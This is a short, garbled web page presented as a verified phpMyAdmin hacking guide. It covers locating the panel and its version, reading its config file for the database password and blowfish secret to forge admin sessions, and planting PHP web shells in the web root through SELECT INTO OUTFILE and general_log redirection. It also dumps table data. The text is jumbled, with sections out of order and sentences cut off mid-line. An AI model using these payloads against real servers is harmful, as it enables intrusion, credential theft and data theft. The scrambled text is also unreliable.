Phpmyadmin Hacktricks Verified May 2026

curl -s http://target/phpmyadmin/README | grep "Version" Verified: phpMyAdmin 5.1.1 leaks version in the default CSS comment: /* v5.1.1 */ . 2.1 Default Credentials (Still Works in 2025) Despite warnings, many test environments (and sadly some production) still use:

LOAD_FILE('/etc/phpmyadmin/config.inc.php'); Look for $cfg['Servers'][$i]['password'] . If $cfg['blowfish_secret'] is weak or default, you can decrypt session cookies and impersonate admin. phpmyadmin hacktricks verified

/phpmyadmin/ /pma/ /dbadmin/ /myadmin/ /phpMyAdmin/ /MySQL/ /phpmyadmin2/ /phpmyadmin3/ /pma_db/ Use curl -k -I https://target/phpmyadmin/ and look for the Set-Cookie: phpMyAdmin= header. That header is unique to phpMyAdmin. 1.2 Version Detection Access /doc/html/index.html or /changelog.php to read the version number. SELECT "<

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php" Then access: http://target/shell.php?cmd=id SET GLOBAL general_log_file = '/var/www/html/shell.php'

Use Hydra or a simple Python script. A one-liner:

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['c']); ?>"; -- This gets written to log file Requires MySQL SUPER privilege (often given to root user in phpMyAdmin). 3.3 User-Defined Functions (UDF) for Persistent Shell Create a MySQL UDF that executes system commands.

SELECT * FROM information_schema.tables INTO OUTFILE '/tmp/db_dump.sql'; Or use built-in export (less stealthy but faster). If outbound internet is allowed but direct connections monitored, use DNS: